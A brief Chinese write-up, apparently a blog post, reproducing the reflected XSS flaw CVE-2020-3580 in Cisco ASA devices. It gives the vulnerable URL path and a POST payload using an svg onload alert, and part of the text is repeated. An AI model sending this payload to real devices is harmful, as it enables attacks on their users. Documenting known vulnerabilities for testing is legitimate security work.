CISCO ASA设备的POST反射型XSS漏洞复现(CVE-2020-3580)
今天正好碰到这个系统,找了下存在这个漏洞,记录下
是这个界面的,就打开hackbar,注意url后面部分和post部分
URL部分
/+CSCOE+/saml/sp/acs?tgname=a
POST部分
SAMLResponse="><svg/onload=alert('XSSS')>
执行后就会弹窗
MU5735 R.I.P
今天正好碰到这个系统,找了下存在这个漏洞,记录下
是这个界面的,就打开hackbar,注意url后面部分和post部分
URL部分
/+CSCOE+/saml/sp/acs?tgname=a
POST部分
SAMLResponse="><svg/onload=alert('XSSS')>
执行后就会弹窗
